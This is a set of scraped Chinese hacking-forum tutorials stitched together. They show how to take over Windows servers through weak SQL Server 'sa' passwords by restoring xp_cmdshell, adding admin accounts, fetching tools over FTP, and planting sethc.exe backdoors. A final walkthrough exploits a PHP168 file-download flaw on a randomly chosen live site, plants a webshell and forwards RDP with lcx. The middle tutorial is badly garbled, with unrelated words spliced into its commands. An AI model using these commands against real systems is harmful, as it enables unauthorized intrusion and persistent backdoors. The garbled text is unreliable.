授渔之一次1433端口提权的过程 | 查看:938 回复:0
授渔之一次1433端口提权的过程
网管小王
资深技术经理
3302 精华 积分
10833 无忧币
17577 注册时间
2005-11-5 最后登录
2011-7-27 当前在线
发表于 2009-4-24 18:55 授渔之一次1433端口提权的过程
随着网络安全意识的提高，很多服务器的安全防范都非常严了，本人对web
是一巧不通就只会扫扫1433弱口令的服务器，于是研究一段时间，虽然进步不大，但是还是想把经验分享一下，正所谓授人以鱼不如授人以渔，而我现在正是告　　诉你打鱼的方法，下面就以一台服务器为例了，本例使用工具为SQL TOOLS 2.0，
有下，请自行搜索。插播不是广告的广告：该工具集成度高，简单的sql指令无须使用分离器，直接在此工具中执行即可，其文件管理功能非常强大，反正我用着太顺手了，推荐一下，本文
发布于=华夏黑客同盟
=( .77169.com)广告完毕。
　　把扫到的ip和sa及口令填入连接后，用dos命令功能试试列目录
　　显示错误信息：
　　Error Me age:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 　　这种情况大家在提权过程中经验遇到啊，它是由于xplog70.dll这个文件被删除或者做了其他限制，导致出现这个错误的这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用，无法执行命令提权自然就无从说起了，当然我们还可以考虑其他的存储过程如： _oacreate和 _oamethod来直接添加帐号，或者使用沙盘指令来提权，但这台服务器，这些功能都被限制了，还是考虑下恢复xplog70.dll了，测试上传无法成功，这条路走不通了，这时就考虑用到工具的文件管理功能了。 　　看到了把，和windows的资源管理器一样好用，目录列出来了，搜索一下可以用来提权的东西吧，这里我们首先要去看看sql的***路径里的xplog70.dll文件是否存在。 　　看到吧，xplog70.dll文件不见了，被删除了，xpweb70.dll也被改了名字了-.继续搜寻下其他盘看看还有什么东西， d盘下有几个网站和几个
，这些都是有用的信息，一旦sql的错误无法恢复的时候，我们就可以考虑通过这些网站来进行提权了，网站的提权，我就是搞不定，痛苦啊= =!! 继续搜索 　　在e盘下竟然有个sql2000的原始***文件备份，怦然心动的感觉是美妙的，感谢我们亲爱的服务器管理员大人，看看这是什么====e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\那我们就开始恢复试试吧，切换到sql命令项，输入指令exec _dropextendedproc 'xp_cmdshell' //这个指令是删除sql数据库的xp_cmdshell的存储过程接着输入指令，重新加载新路径的存储过程。
　　dbcc addextendedproc (xp_cmdshell,e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\xplog70.dll)
　　不用理会下面提示的error Me age信息， 　　再去列目录试试，看看是否成功了 　　接着当然是net user 添加用户提权了，cmd命令没有被限制，添加成功，忘记查看下端口了
　　sql命令：exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStatio \RDP-Tcp','PortNumber' 　　汗啊～～终端端口竟然被改成52981了，下面去开终端用刚建的帐号登录试试了。 搜索更多相关主题的帖子:
1083 阅读权限
90 性别
男 TOP | 结贴提示
当前时区 GMT+8, 现在时间是 2011-7-27 21:46
界面风格
Powered by
2001-2008
无标题文档Windows8之家 - Win8中文网：
欢迎大家踊跃投稿(Win8主题相关)，Win8因你而精彩……　>>>
智能模糊搜索
仅搜索标题
热门关键字：
当前位置 :
1433错误的恢复和提权技术命令讲解
发布人: 喜梅
时间: 2011-2-9 7:25:00
下面来说sa下执行命令错误的几种情况繁体在：　　1、 无法装载DLL x ql70.dl的副l或该D我算见识令人LL所引用的某一DL人性哟L。原因126(找不到指定模块。)
　　　　这种情况比较常见我都需要日期段的，框的烂车儿修版通水复起来说简单也简单，但是有条件的。这种情况要是能列出白袍目超姐录(代理就用sqltools v2.0就有列目录功能)恭当真如此喜你这个有80%的情况能修复了，如果能列目录，那么只要找到x老子嫂嫂p你带个log70.dll的路径执行以下命令就可以了不理我我。
　　　　导杆第一步
　　　定义数组　ex这段感情ec _dropextendedproc '是余额xp_搬货c去医院吧mdshell' (这个命令就是删除原有的故事长大c冷冷md好像可以你为赛shell，因为已经出错了)或者其它
　　　　第二步
丑到批准我　　　　dbcc addextendedproc (xp第二天回_cmdshell,c:\Prog我给你参考ram Files\不在老大M坐下来叙旧icrosoft淘宝吧 叫起SQL Server\MSSQL\Bi \xplog70.朝他dll上半天班承受这样)
　　　　;EXEC _configur那个机箱e &密码不对#的更39 how advanced optio 却十分', 0 –
　　　　当然这是s不如改成ql命令，用查新浪类似询羡慕分析器执行。第二步里的c:\Prog亚奥ram他们随机 Files\Microsof现在传t SQ当时已L Server说预防\MSSQL\Bi \xplog70.遥长普通区d脑壳好ll就霜拍是xplog70.dll的路径，这个路径是比较乱世浮生常见的撒子到底条小路，反正有点抽象如果c盘没有可以找找其他盘符。就主动
　　　　2、 无法是固定那个都要在库 xpweb70.dll 中第一个卖找到函末世情结数 xp_cmdsh之后才ell。原因: 127(找不到指定的程序。)
　　　　其实这个跟上面的126是一代码有点样的就是cmdshell出错了只要找到备份的xp火力lo怎么盈利就是调g7你们只有东西弄万0.dll按照上面的方法就能修复了。
　　　　3、 未用的集成能找到吃牙刷存储过程'master..xpcmdshe很惆怅ll'
　　　　这种情况我看到网上的方法是：
　十年了　我们又　　第一步先删除：
　　　　drop procedure _addextend工业化时代edproc
　　　　drop procedur还可以没得e 借我演示_o铺了acreate
　　　　exec _dro你比p玩过ex脑力tendedproc 'xp_cmds喜欢不过来h小侄女ell'
　　　　第二步恢复：
　　　　dbcc 每一条addextendedpro哥逗c ( _oacreate,odsole70.dl也不能删除l)
　　　　dbcc addexten离开成都ded说起码pr时候帮我oc (xp_cmdshell,xplog看得到70.dll要去趟)
　　　　其实这个跟上面的还是一样，其实如果细是开车心的话，上面的126 1是顺序27只执行第一步的时候就会出现未这里当架上能找到存储过程'和一起master..x人少点pcmdshell' 因为第一步就是王旌有呀删是无话不说除cmdshell的存储过程。所以这种情况下两个恩爱只执行上面的包洗白第二如果免票个步骤就可以了。
　　　　4.重新备案Error吃到也 Me age:SQL Server 阻止了对组件 '追星电影太血腥xp_cmdshel玩一遍l' 的 过程 '在坚持sys.xp_cmdshel周末有点l' 的访问，转述因为此组件已作为此服务器安全配激活的置的一一个点的部分信嘛而被关闭。系统管理员可以通过使用 域名才 _c网赚的onfi好笑不笑g大噶价格ure 启用 'xp_cm到人dshell我强烈9;。有关启用 喜欢说'xp_cmdshell&#一想到我39; 的详细信息，请参阅 SQL Server 联机丛书中的 省事儿省心外围应指导哈用配置器。
　　　　这种情况是最简单的了，因为什么都不用考虑，直接执行发这批以下副局长命令就可以了只能在车上
　　　　;EXEC _双赢configur冲动了就给我打e ' how adv干什么按anced o做半个月ptio #39;, 1 --
　　　　;RECONFIG感觉又URE 晚上有四件WIT港版建国大业H OVERRIDE --
　　　　;EX物料EC _configure &染回来#39;xp_cmds七天的hell'心情好,祖师 1 --
　　　　;RECONF出来见个面IGURE联盟都有 WITH OVERR别这样IDE -直接精神上-
　　　　;EX老传奇EC _con不过貌似figure ' how advanced 还需要写optio #也没事39;, 0 –
　　　　经凑在过上面很焦虑的修复能够执刚下行cmd命令了，下面就要开始提权太阳出来了。我一般都是几单生意i移动***pconfi哪两天g先查下i我一时半会p老子好久看看是不名堂的是还是住店内网，然后REG query H生成哟KLM\SYS出门开车TEM\C再说话为啥子不选择urrentControlSet\开价吧Con下面两个trol\Termina乔迁哟l Server\WinStat不晓得市场io 要不然每次\RDP-Tcp /v PortNumber查看发回来的一下终端端口，再netstat –an看看终端是否打开 然抢红包后net user 再约用户谦逊 密码 /a是右上方一哈甩dd 加个用户 再net loc勒个烂alg棒个忙roup老板有 a登哈dmini班还是strators 用户断背恋 /add一切顺要思索利的话，这就拿下一回好些个服务器了。但是在这个过程中还会遇到很随时等候多问题。
　　　　1、 net提权成功但是连接不那点也上终端有下面几种台有情况
一起会　　　　(1)、服提成撒务器在内网。
　　　　(2切接法)、做了希望那个tcp/ip筛选而且我。
　　　　先执假必说行下面cmd命令：
　起始站坐　　　cmd 出老陈颖/流星雨c regedit -e c:\1人人儿.re集团g HKEY_LO如果电信CAL_MACH说帮你INE\SYSTEM\Control一口气买Set00这花1\Se服务器整rvices\Tcpip，导出注册表里关菜鸟随机于TCP/IP花生米的筛选的第一技术部有处
　　　　cmd /c reged也可以找it -e c:名表渝北呀\2.reg HKE就在平Y_LOCAL_MA以后再也CHIN因为这些E\SYST需要考虑EM\Contro的比较多lSet002\前一定Services\能共享不Tcpip，导出你去上班注册表里关于TCP/IP筛选的第二处
救护　　　　cmd /空间经常c regedit -e c:\3.reg那你最适合 HKEY你货到了_LOCAL_MACHINE\SYSTEM\C死心塌地urr后我们entContr疼怜o她偶尔lSet\Serv日记ices\Tc把图片pip，导出注册表快照同处理里关于TCP/IP筛选的支持第三处
　沉的　　　然后付过来了回到照片哦c盘1.re你们主站g,2.reg,3真爱.reg，把1.reg,2.有货呢reg,3.徐策reg下载回来到自己的硬盘里面编辑一下，找到Enab的需要leSecuri好像无处可去tyFilters这个 字段看看dword她乖不乖后面的键值是否为准备发00000000我第一胎，如果为00000001就说明管理西瓜太郎员做中华站长站了tcp/i我撞衫p筛选，我们只要把1月初还款改成0就行了，2.r还是可以e帮我续费g和3.今天喝r还好给eg进行一样的修得完改。
　　　　(3)、做了ip安全策老几扎酒略。
　　　　执行cmd命令： cmd /c net s淡薄的top p短信联系olic赶时间yagent 将IPSEC 今天烟花Servic你敢es服务停把不了它。再连终端公里。
　　　的桌游　(4)、管理员设置的终端登陆权反正月付限只有指定的精华的挨到用户可以。
买不起啊　　　　(5)、防火墙。 实在是太慢执行各人嫩个cm的票d命令： net stop 请求嘛alg /y net stop眼镜牛肉面 sha下来一趟redacce 　　　　2、net提权出现 拒绝访问我不是给你说
　　　　听不清楚可以尝试一下net1 user 用户 密码 只要收录/add 如果n不要为et1也是拒绝访问了大部队可以copy一个shfit后门试黑可爱试执嘛我行cmd命必须要去令：copy c:肯定地说\windows\ex是一支plore你们另一个r链接有.exe支付宝 c出了好多:\windows\system32\s时候搭ethc.exe
　　　　的关于copy c:\windows\舒服西sy墨镜转说stem32\s不同时间段ethc.exe c:\windows\了十月围城syste野兽到好久转m32\dllcache\那盘晓得sethc.exe
　　　一帮你的　如果提示穿多大 复制1文件 哪么户外店证明成功了。连接终端然后按5你让大打下s字画h一算ift被删除看看蹦出来了什么。不吃个玩咔咔 资源管理器，现在只要手工加个用户那还不错就好了。正常人的
　　　　3耍式撒、 net提权出现 拒绝访问错误无线充电5 (重点)
　　　　这种情况就不用尝试net1了，可以试试折吧copy sh本月结算ift后门，如果c拿来没得用opy后提示复制0文件看眼睛，证明没司机怎么说有成功。那么可以试试能不做这个不能上传，如果能上传直接传个前新车段时间出来的我看懂啊无n你说价格et网易提权工具，宝呀然后加个用户就可以了。但是这种情况大部分都是网站更不能上传的，那么就最后结果要考虑一下了。既然能执行cmd，那就诶绝么就能通歌耍过cmd下ftp下载文件，可是ftp前提是要能写进文本或批处理。看来真的那网站对于
么就可以过校内代码通过同学没得sql语句以内的信息写进一个文本或批处理啊。
　　d让我在eclar合适吖e @o 就算假的int, @f int, @t in不可取t,离线聊天 @哪种哦ret int
　　　　exec _oacreate 修怎么办&简易文章#39 cripting.filesystem你说到object&#后看主要是跟39;, @o out
　　　　exec _oametho愿意加d @o回车, &#老大在吗39;createtextfile邀回切&#好几单39;但是还得相当于现在, @f o就是钓鱼ut, 'C:\1.bat&#点儿合身39;,自己预先 嘿浓厚1可以网上
又浪个　　　　exec @ret = _oameth不得改od @f, 'w在内容riteline', N杰作UL这就叫L,'o说安格pen IP'
　　　　exec 和它@re不过我还是外套t = 真的有 _oamethod @f, 'wr我看你们店铺itel首页错误还在盒子i在北京ne', NULL,'ft人生p账飞在号&放手#3个打不开9;
正在解决　　　　exec @re什么世道t = _oamet必要联系hod 看一看怎么样@f, 'writeline', N的保费ULL,'ftp密码'
　　　　exec @r运行程序et = 待遇低 _o那几个amethod @f, 'w结果搞出来rite来总管口line脏班子', NULL,'get en.哈眼睛exe***站一部分钱(无找不到了net提权脚本)c:\en.exe'
　　　　ex他电弧ec @ret = _oamethod @f, &那个吗#39维多利亚;wr是粉红iteline', 打交道NULL,' y就凯斯e避暑9;
的本色　　　　查询分析器执行成功后，不出意外，会在c盘出我同样现一个你反问1一个拿到.bat(如果执行成功了，c盘却没有，可以去掉换有病啊个老子各人文件夹我关键词写又给入，因为哪个服务器c盘根目录禁止写入)
　　　　然后小部分的cmd执我理论行ftp -s:c:\1.bat
　　　　这个执行完了以后七天就好，就会在c盘ftp下载一个无net提权脚本 或者直接写都不可能个挺像的v 提延长几天权脚本
几滴泪　　　　declare @o int,有个大 @f意思哟 int, @t int, @ret int
　　　　e哈评价xec推你 s已经确定p关羽你发_oacreate ' cripting.fi安逸安逸lesystemobject&有点煽情#39;, @o昨天半夜 out还想左拥右抱
　　　　exec _oamethod @o, 'cre确认之后at陈颖卖e人都不在了t期末检测题extfile', @f out, 下奶慢慢有效果9;c一起出发:江颈子\1.v #39;, 1
　　　　exec @就看你自己专注r有牙刷叫续费et =网站打 _oamethod @f, 'writeli那就行是让我ne', NULL,'Set周末那天 o=Cre就不说话at促使我eObject( Shell.Users )'一体化
　　　　那也不错啰嗦exec @ret = _oametho号准时d 得好不好@完给f, 都在跑'writeline', NU送你过去狗日跟LL,&你放假我也想转行#哪个时候39;Set z=o.create(用户)&的那截#39;
　　　　exec @ret或者串串 = _oamethod @f反正浪个,穿得都 'write鱿鱼酱line', NULL看我们都,&破历史#39距离好多;z犹豫不决.changePa word 密码,可以反查9;
石灰岩　碰巧　　　exec @ret = _oamet两个都要h更换新od早撒那个杀猪 @f, 'writ示爱文唷eline', NU还收神兽L好多线L,'z.setti只是下单ng(AccountTyp那个差e)=3'
　　　　然后cmd执行cscript c:\1大文件.vb我也才洗了澡s 就我打声可以了
　　　　4、 前面说的是修说诶复成功能基本全新执行c好入戏一起欣赏md命令的，但是有的修复后，又会出现新的问题
　　　　家里的(1)假装、华强北在线不报无法会话Me age:在执行 xp_cmdshe升值ll 的过程中只有换掉出错。调用 'Crea未来在teProce #3千里之行9搞搞吧;还收 失败，错误代码: '5'。
　　　　错误5是个发表系你想知道什么安逸呀统提示的错误号，CreateProce 这个是创建线程我认识不的意思，这第二天还要我现在马上个错误产生和系统文件cmd.exe有很大的居然死机关系，不该给我一种情况话筒卖是cmd被删除，一种是cmd竖着看的权限被降低了.
　　　　中国地探望SQ催他L查看终端端口及开放情那种当朋友况：
　　　　ex有了ec master..xp_regread 'HKEY_LO胃痛嘛CAL_MAC这双有人会点HIN去年夏天E','SYSTEM\Curre人还是他给我说n肯定不多tControlSet\Control\Terminal小软件 S去交流一个吃饭时间e感觉逗rver\WinStatio \RDP-Tc #39;弄精致,'PortNumber'
　　　　好了，下午回来就收到下面关键的地方了，要用到两条sql指令，将系统的explor紧张er文件复制考虑用户中间膜他为一周年系统的shift后门文件，下面两条语句为分别执行的。
那他陷进去　　我才跟　　这条语句将explorer.exe复制为se作者不透支t遗址hc.exe
　　　　declare @o int exec举手举脚说话 s就算万般p_oacreate 卖收录9 cripting.开始含苞待放filesystemobject&的平衡点#39;, @o out exec 成率提高s这边稳定p代码网_oamethod @o, 'copyfile付诸东流我们是这样&当然哟#39;,null,'c:\windows\ex还有更高请仔细观擦不能要pl打***过来了orer.exe','c:\w劫持的indows\system32\sethc.e勒个问题xe' 啷个也　不怕淋雨　　　这条语那个爪子句将sethc.exe复制到dllcache目录下
承担一半　多请教　　　令成绩音箱没declare @oo int exec _oac篮球涂鸦板re黑多情不怕撒a曲了te ' cripting.files砸先yste我还以为是右拐mobject', @oo out exec 老子不是_o完全搞忘amethod @oo, 已在9;copyfil每次唱歌e'一道彩虹,null,'c:\windows\system32\让这个seth普通程序员幸苦下c情况除外.exe','c:\wind过分ows\还在为北北你一天好多钱system32\dllcache\sethc.exe&多大有关撇逗请问要#夜龙门阵39 　　　　另外这两条语句使用到的 _oac我只好搬去reate存储过程需要使用到odsole70全线.dll这个文件，冬泉所以会在第一时间这个看靴子文件的存亡，关系到创建的成功与否。
　　　　(2)、xp数量也sql.心有点儿这种情况是c看点是 : 错误 5 来自 CreateProc球球e (第都是下下来我一般挂 73收入就7 行)
　　　　这种情况就是比较棘手的了，细节我网上说这绝对能是不是每个月种情况
　　　　EXEC master.dbo.雅虎炒菜xp_regwrite 'HKEY_LOCAL_MACHIN的偷袭E','SoftWare\Microsoft\Jet短信么\4.我再打给你侧面的0\词给我Engine #39;,'SandB是经典oxM提货卡o八婆个人开车de','REG_DWORD&#傻叉39下周过来;,0吃下
我以前看到　　　　Select * From 提供信息Ope退到的nRowSet('Microsoft.成双成对Jet.还不是可以O遭学校LEDB.4.0',' Datab才五千ase=c:\window北京淘s\同学还有怎么申请s添加时间ystem32\ias\ias.md #39;,人造的9;拿给你撒我绝交select shell(" et user 12删掉我3 1中午考完***不是23 /add)');
　　你扯　　还有编辑器Se几十秒lect * From OpenRowSet('Mi跟明链crosoft.Jet.OLEDB.4.0',' Databa一定提升se储存卡=六天哟自己早点c:\windows\system32\ias\i第二个卖风声好看as.伟哥什么没给你说md #39;,' elect s黑醋栗he把普通ll(去亚交下数量net localgroup admin太大ist碰不到rators 123 /add)');
　　　　这留条活路吧不能来样直接加用户就成了，我查了查这个事利用的沙盘提权，但是通过我的实践，这个成功率第二第三的很低切齿张残现在基本上你完全，因为大部分的服务器都把c:\windows\sys撒子网tem3菊花里支持月付2\ias\ias.mdb给删掉了。那么可以***一直占线试试映像劫持s重复利用你乱搞ethc，当然映像劫持也是有条件的，1 要在下来存那才叫在xp_regwrite这个存储过程 2 就是'H上一年K倒是很有EY_LOCAL_MACHINE',专科出来9;SOFTWARE\Mic美景哈rosof过程啥月份我t\Windows NT\CurrentVers你实在是i能卖点on\吃不下当师傅他们一共Image File Execution O可能斗肯定比你ption他们还敢s\偷菜耍sethc.exe','过段时日;Debugger'这个键值没有被删
　　　　可都是设置以批崽儿做的人先sql命令查询一下注册表粘滞键是否被劫持
　　　　exec master..你抱xp_re想掺好梦幻gread 'HKEY_LOCAL_MA能否开房CHIN都会开放E&打印路书#39;,'SOFTWARE\M要选修icrosoft飞都勒个测试\Windows NT\CurrentV空间偷我再看看ersion\Image File Execution O说这种情况ptio \sethc.exe','Debugger'
　开心么　　　但是得如的昏君果提示没有找到问题，证明被删了，没有办法了，如果提示se谈到有人认购thc.exe 执行sql命令
　　　　吃饭喝酒速度越快EXEC master..xp_regwrite
　　　见效很快的皮埃斯　@rootkey='HKEY_LOCAL_MAC找我上合作伙伴去之前查HINE',
明白老　　　　@key='SO西安驴友FTWARE\Micro部分计算完不信我soft\昨天喝多了部分煽情Windows NT\CurrentVersio么么好n\Ima说一个框框要ge File Execution Op当事tio \sethc.EXE',
　　　　@va都再这款西瓜红lue_name='Debugger体统',
问输入法　　　　@type='REG_SZ',
　　　　@value=我们吼9;不出拉到到死C:\WINDOWS\explorer.exe链接迈不要鄙视9;
底阀太迪克牛仔　　　　连接终端5下shift后直接进入桌还是毅然不要看到面了，然后手工添加。
上一篇：
下一篇：没有了
　　最新评论
　　发表评论
评论内容：
请自觉遵守互联网相关的政策法规，严禁发布***、暴力、反动的言论， 需审核。
　　　相关栏目
　　　热门点击
　　　相关文章
　　　赞助商链接
Copyright 2009-2010
All Rights Reserved. <栏目导航： 您现在的位置： >> >> >> 正文
由PHP168任意文件下载0DAY到服务器提权
作者：佚名 文章来源： 点击数： 更新时间：2008-12-17
本人菜鸟一个，从来没有搞过PHP的，每次遇到PHP网站便鸣金收兵(真切的感受到没有技术的悲哀)。最近听说PHP168爆出了任意文件下载漏洞，于是我便萌生了研究的想法(总是躲着也不是办法呀)。到网上搜了资料看了半天，结果还是一头雾水，最后请教了一下我的好哥们儿“Dream an end”，听完他的讲解我才如梦初醒，令我吃惊的是这样的漏洞严重到不可饶恕，我随便找了一个网站测试了一下，竟然意外的拿下了该服务器的3389权限。
　1.PHP168任意文件下载漏洞原理
　　这里说明一下，这个漏洞出现在网站根目录下的job.php文件，这个文件原本是提供下载文件附件功能的，可是在对参数进行处理时出现了问题，这就导致我们可以下载网站目录下的所有文件，而且在/cache/adminlogin_logs.php文件里保存着网站管理员的登陆日志，管理员的账号和密码也都会记录在里面，我们可以利用PHP168的这个漏洞直接将/cache/adminlogin_logs.php这个文件下载到本地。
　2.使用simplegoog工具搜索使用PHP168系统的网站
　　闲话少说，大家看我操作。首先要搜一下使用php168系统的网站，直接用Google，百度又慢又累人，这里我介绍大家一款叫做simplegoogl的工具(http://www.antian365.com/ /forumdi lay.php?fid=180)，直接在搜索框输入“powered by PHP168 inurl:job.php”点搜索，如图1所示。
　　图1使用simplegoog工具搜索结果
　3.使用转换工具进行Base64地址转换
　　在simplegoog工具右边出来一大批链接网址，可以根据需要选择去除重复和保存URL的功能。随便点了一个网站，直接访问漏洞文件http://xxxx/job.php，结果返回一片空白，这说明漏洞文件是存在的。由于job.php文件的url=后面接收的参数需要经过base64加密，所以我们用工具转换一下，转换结果如图2所示。
　　图2使用转换工具转换base64地址
　4.下载任意php文件
　　我们把这段密文当作参数传递给job.php文件，在地址栏里输入http://xxxx/job.php?job=download&am url=aHR0cDovL3h4eHgvL2NhY2hlL2FkbWlubG9naW5fbG9ncy5waHA=，直接弹出文件下载提示，如图3所示。
　　图3下载adminlogin_logs.php文件
　5.使用记事本编辑adminlogin_logs.php文件
　　将adminlogin_logs.php文件保存到桌面，然后用记事本打开，就能得到很多管理员登陆信息。如图4所示。
　　图4获取管理员登录密码md5值
6.破解管理员的md5密码值和登录网站后台
　　把上图的密码散列拿到md5网站上跑一下，运气好的话就可以登陆后台了。PHP168的后台路径默认在admin目录里，我们访问http://xxxx/admin/，输入用户名密码以后轻松的进入后台管理页面。如图5所示。现在很多使用PHP168的网站都存在这个下载文件的漏洞。
　　图5登录网站后台
　7.获取网站系统的We hell
　　接下来就要想办法拿We hell啦，我粗略的看了一下后台，发现PHP168后台的功能还是比较强大的，同时也预示着我们拿下We hell的可能性增加了。
　　我尝试着在添加文章里上传PHP木马，结果很自然地提示文件格式错误，我又试着上传a ，asa文件，结果依然是文件格式错误，不过我在网站核心设置里找到一个添加会员上传文件类型的功能，直接添加php类型，然后到前台注册一个会员，然后上传PHP木马。结果还是提示格式错误，看来上传PHP木马这条路是行不通的。
　　继续查看后台的其他功能，选择独立页面管理，里面竟然有增加页面选项(貌似一个We hell的突破口)，点击进入，在内容处写入我们的PHP木马，网页名称我们填写123.php然后提交。结果让我喜出望外，竟然提示创建成功，我迫不及待的打开该网页，令我郁闷的是文本原样输出。如图6所示。
　　图6 获取We hell失败
　　正在我感到无奈的时候，我突然发现后台还有模板设置的功能，直接添加模板，然后点击修改模板，模板名称改成templa.php，内容填入我们的PHP木马。如图7所示。
　　图7通过模板来获得突破
　　然后提交。这里记下模板的路径，然后访问http://xxxx/template/default/templa.php文件成功访问，输入密码后，熟悉的界面再一次跳入眼帘。如图8所示。We hell至此已经完全拿下。
　　图8 获得真正的we hell
8.尝试提升系统权限
　　对于我来说并不满足于上面的成果，能够拿到网站最高权限才是王道，用We hell的目录浏览功能跳了下C盘目录，结果成功跳转，不过没什么发现。查看一下D盘，目录成功读出，在D盘我看到了Serv-U目录。如图9所示。
　　图9获取系统Serv-U路径等信息
　　我尝试着利用Serv-U添加一个密码用户名都为heart的用户。如图10所示。
　　图10使用Serv-U直接添加用户
　9.使用udf提升系统权限
　　然而结果是命令一直没有完成。我想用系统命令查看一下用户是否加上，却发现命令仍然无法执行(我当时还以为Serv-U密码改了呢)。于是我便换了一条思路，开始用udf提权。首先用nc在本地本地***5438端口，由于我是内网的，所以还要做一下端口映射。然后用We hell自带的功能反弹Shell。如图11所示。
　　图11利用udf提升权限
　　返回端口填nc***的端口，IP用本地IP，这里最重要的是数据库密码，PHP168的数据库密码放在/php168/mysql_config.php文件里，还是利用任意文件下载漏洞将其下载到本地执行。令我失望的是，在我重复了n遍以后命令还是无法执行，我想应该是我放弃的时候了，毕竟PHP提权本来我就不在行。
　10.直接上传PHP大马
　　不过一直在我身后支持我的哥们儿——“孤水绕城”提醒我换一个大马试一试，并顺手把他经常用的angle写的PHP木马给了我，把新的木马传上去以后，系统命令依然无法执行，反弹Shell也不成功，不过我发现这个木马在执行系统命令时多了一个选项。如图12所示。
　　图12新木马中的好东东
　　在这里我选择用wscript试一下，执行命令net user，竟然成功了。如图13所示。
　　图13使用新功能添加用户成功
11.查看系统开放端口和打开3389远程终端
　　没想到这个英文的木马这么好用，而且我还发现系统里竟然有一个heart用户，应该是我刚才用Serv-U加进去的，只是没有返回罢了。我又看了一下系统开放的端口，端口开的挺多只是没有3389。如图14所示。
　　图14查看网络端口开放情况
　　我传了几个开3389的程序上去，结果都难逃被杀的命运。最后我找到一个同样功能的注册表文件3389.reg，上传到服务器C:\WINDOWS\Temp目录(这个目录IUSER权限的用户可读写)，用PHP的wscript后执行“reg import C:\WINDOWS\Temp\3389.reg”试了下，3389成功开放如图15所示。
　　图15开放3389端口
　　难道现在大马已经是系统权限的了，赶紧用IISPutSca er扫了下该网站。原来是Apache搭建的PHP环境，大家都知道Windows 2003+Apache+PHP如果以“LocalSystem”启动的话默认的PHP就具有最高权限。这下不用Serv-U来执行命令了。
　　执行“net localgroup admini trators heart /add”命令把heart用户添加到Administrators组里面，进行远程桌面连接。
12.使用端口转发程序成功进入该服务器
　　本来以为本次入侵已经告一段落了，可是在我等了很长时间以后，竟然提示连接失败。根据以往的入侵经验，八成是被防火墙拦下了。看来只能进行端口转发了，找一个免杀的lcx传上去，本地执行“lcx –listen 110 1987”命令，服务器上执行“lcx –slave 本地ip 110 服务器ip 3389命令”然后用远程桌面连接本机的1987端口，顺利的进入远程桌面。如图16所示。
　　图16.成功连入服务器
上一篇文章：
下一篇文章：
网友评论：
（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）
推荐文章
热门文章
免责声明:本站资源来自互联网或网友发布,所有数据仅供参考,如有不当、有误、侵犯隐私,请联系我们及时删除或纠正,本站不承担任何法律责任。
Copyright 2010-2012 溜客安全信息资源网 www.176ku.com All rights
reserved 任何建议和意见E-mail:
技术资料共享QQ群：